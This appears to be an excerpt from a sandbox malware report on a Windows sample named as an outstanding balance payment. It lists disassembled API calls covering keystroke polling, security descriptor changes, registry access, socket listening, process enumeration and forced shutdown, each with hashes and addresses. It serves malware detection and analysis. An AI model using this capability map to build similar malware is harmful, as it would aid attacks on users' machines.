                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                          • Instruction ID: 4087c14fb702fdf65c3b486edb4fae555819c27f8d76b5767b4952e00019e195
                                                          • Opcode Fuzzy Hash: a82b2e9d2a795247821af482bd41eb8c71b49af25815ef8352d678405b985df8
                                                          • Instruction Fuzzy Hash: EE617A725183059FD710EF64C8809AFB3E8FF89310F0489AAF989C7251DB75E949CB92
                                                          APIs
                                                            • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                            • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                            • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                            • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                            • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                            • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                            • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                            • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A6D0
                                                          • _memset.LIBCMT ref: 00B9A6E5
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A704
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B9A715
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A752
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A76E
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B9A78B
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A79A
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B9A7A1
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A7C2
                                                          • CopySid.ADVAPI32(00000000), ref: 00B9A7C9
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A7FA
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9A820
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9A834
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                          • Instruction ID: 15efa3c7e71a83125500b19a300ee5027f2b2d2d294dd96076e697bf2baa4685
                                                          • Opcode Fuzzy Hash: f05d59aebac56e52c159f23d7829bfd87e4d337b4ca16c0fab9cebe5c7e643ee
                                                          • Instruction Fuzzy Hash: 2D514A71900249AFDF10DFA5DC95AEEBBF9FF04300F048169F911AB291DB759A06CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AIWS$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                          • API String ID: 0-3266594281
                                                          • Opcode ID: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                          • Instruction ID: 9b5843d76f971d74a3abffba831cfb8bc9a51fda686ba509d583c7d4f8dcd22a
                                                          • Opcode Fuzzy Hash: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                          • Instruction Fuzzy Hash: BA725C71E042699BDF14CF59C8807AEB7F5FF48714F1481AAE809AB380DB749E81DB94
                                                          APIs
                                                            • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                            • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                          • _wcscat.LIBCMT ref: 00BA6441
                                                          • __wsplitpath.LIBCMT ref: 00BA645F
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BA6474
                                                          • _wcscpy.LIBCMT ref: 00BA64A3
                                                          • _wcscat.LIBCMT ref: 00BA64B8
                                                          • _wcscat.LIBCMT ref: 00BA64CA
                                                          • DeleteFileW.KERNEL32(?), ref: 00BA64DA
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA64EB
                                                          • FindClose.KERNEL32(00000000), ref: 00BA6506
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                          • String ID: \*.*
                                                          • API String ID: 2643075503-1173974218
                                                          • Opcode ID: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                          • Instruction ID: 4955fcd41e8db578958da51c1aa166524baf3d7a717c1936e7949d1e6f939fea
                                                          • Opcode Fuzzy Hash: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                          • Instruction Fuzzy Hash: AD3182F280C388AEC721EBA488859DB77DCAF56310F44096AF6D9C3141EA35D50DC7A7
                                                          APIs
                                                            • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC328E
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BC332D
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BC33C5
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BC3604
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BC3611
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: 7a82cb66404f4046f3b97f4ae52af728fce7bf3e2545f5669cb5a8d11646ff2b
                                                          • Instruction ID: 20d03a4eb3716d03dfa6062c610b8d55aaa3ed509ac9bac34ef2c7e531ea6f3d
                                                          • Opcode Fuzzy Hash: 7a82cb66404f4046f3b97f4ae52af728fce7bf3e2545f5669cb5a8d11646ff2b
                                                          • Instruction Fuzzy Hash: CEE14B71604210AFCB15DF28C995E2ABBE8FF89714B04C4ADF44ADB262DB35E905CB52
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00BA2B5F
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00BA2BE0
                                                          • GetKeyState.USER32(000000A0), ref: 00BA2BFB
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00BA2C15
                                                          • GetKeyState.USER32(000000A1), ref: 00BA2C2A
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00BA2C42
                                                          • GetKeyState.USER32(00000011), ref: 00BA2C54
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00BA2C6C
                                                          • GetKeyState.USER32(00000012), ref: 00BA2C7E
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00BA2C96
                                                          • GetKeyState.USER32(0000005B), ref: 00BA2CA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                          • Instruction ID: 590cd1c7b49b95b7ed65ae4aa28d55982f21c3f5490bb85d05777f6a202e2c06
                                                          • Opcode Fuzzy Hash: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                          • Instruction Fuzzy Hash: B041D83450C7C96EFF349B6889443AABEE0EB23314F4440D9D9C65B6C1EBA499C4C7A2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                          • Instruction ID: b2994438a565fa295cb75a90cd5512738f29f6fcbadb817a4a2d92ed8dae540b
                                                          • Opcode Fuzzy Hash: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                          • Instruction Fuzzy Hash: 1F214C31300110AFDB11AF64DD89B6D77E8EF54711F0484A9F90ADB2A1DFB9ED018B55
                                                          APIs
                                                            • Part of subcall function 00B99ABF: CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                            • Part of subcall function 00B99ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                            • Part of subcall function 00B99ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                            • Part of subcall function 00B99ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BBC235
                                                          • _memset.LIBCMT ref: 00BBC242
                                                          • _memset.LIBCMT ref: 00BBC360
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00BBC38C
                                                          • CoTaskMemFree.OLE32(?), ref: 00BBC397
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 00BBC3E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                          • Instruction ID: 571b7cedf21f9e4c1636ddf096dc545e51cd5c02068ea492b6ebd2f79f3849e9
                                                          • Opcode Fuzzy Hash: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                          • Instruction Fuzzy Hash: 69910971D00218ABDB10DF94DC95EEEBBF9EF04710F1081AAF519A7291DBB19A45CFA0
                                                          APIs
                                                            • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                            • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                            • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00BA7A0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                          • Instruction ID: 779327c0b85400409b8cecfc9fe4a1cd9b356f391e00abd9de90bd77154f7feb
                                                          • Opcode Fuzzy Hash: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                          • Instruction Fuzzy Hash: E201A7757EC2517FFB285768DC9ABBF73D8DB02740F2404A5B953A60D2DDA15E0081A4
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BB8CA8
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CB7
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00BB8CD3
                                                          • listen.WSOCK32(00000000,00000005), ref: 00BB8CE2
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CFC
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00BB8D10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                          • Instruction ID: 9c5f9f25ecdfe606819f1b709624a37cf774951199018dcfff775b8c650b28ab
                                                          • Opcode Fuzzy Hash: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                          • Instruction Fuzzy Hash: 9521A0716002009FCB10AF68C985BBEB7E9EF49310F108199F916AB2D2CBB0AD45CB51
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA6583
                                                          • __wsplitpath.LIBCMT ref: 00BA65A7
                                                          • _wcscat.LIBCMT ref: 00BA65BA
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                          • String ID:
                                                          • API String ID: 1605983538-0
                                                          • Opcode ID: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                          • Instruction ID: 592bb7ca622c100a3ead99a18d2b1b58010940dd683f67d53fcbee8c8642f881
                                                          • Opcode Fuzzy Hash: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                          • Instruction Fuzzy Hash: 9F2153B1904258ABDB10ABA4CC88BDDB7FCAB55300F5404E9E905E7141DBB19F85CB61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AIWS$ERCP$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-2033079182
                                                          • Opcode ID: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                          • Instruction ID: 6e94091f7ecc37b8bd4fb60a6a73474fd26d76bf5215eb374fcdbb9d181ca544
                                                          • Opcode Fuzzy Hash: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                          • Instruction Fuzzy Hash: E7926C71A0025ACBDF24CF59C8907AEB7F1FB54314F2581EAE816AB280D7799D81CF91
                                                          APIs
                                                            • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00BB9296
                                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00BB92B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 4170576061-0
                                                          • Opcode ID: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                          • Instruction ID: 47201bf38e5121886102eaca03494c2b8641163d97008dc6393807f35c787a8c
                                                          • Opcode Fuzzy Hash: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                          • Instruction Fuzzy Hash: 16419370600204AFDB14AF68CC92E7E77EDEF44724F14859CF95AAB3D2DAB49D018B91
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BAEB8A
                                                          • _wcscmp.LIBCMT ref: 00BAEBBA
                                                          • _wcscmp.LIBCMT ref: 00BAEBCF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BAEBE0
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BAEC0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: cb5b05e1c418331764387579709832c3cc5027a5af7338a365727f76ae2e17f4
                                                          • Instruction ID: 04d8921160c2817dde75554222f46c9c3c6d3ca30f2b32b230f1c2f0437cba3b
                                                          • Opcode Fuzzy Hash: cb5b05e1c418331764387579709832c3cc5027a5af7338a365727f76ae2e17f4
                                                          • Instruction Fuzzy Hash: FC41B1356043029FCB08DF28C4D1AA9B7E4FF4A324F10459DF96A8B3A1DB71E944CB51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                          • Instruction ID: 63c5ce325137e68f52579465abf3f5ac8a449841fab08656bc5d6c34332932be
                                                          • Opcode Fuzzy Hash: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                          • Instruction Fuzzy Hash: 1611B2313005106FE7215F26DC84F6F7BD8EF58761B0944ADF849EB241CF74D90286A4
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7E014,75920AE0,00B7DEF1,00BFDC38,?,?), ref: 00B7E02C
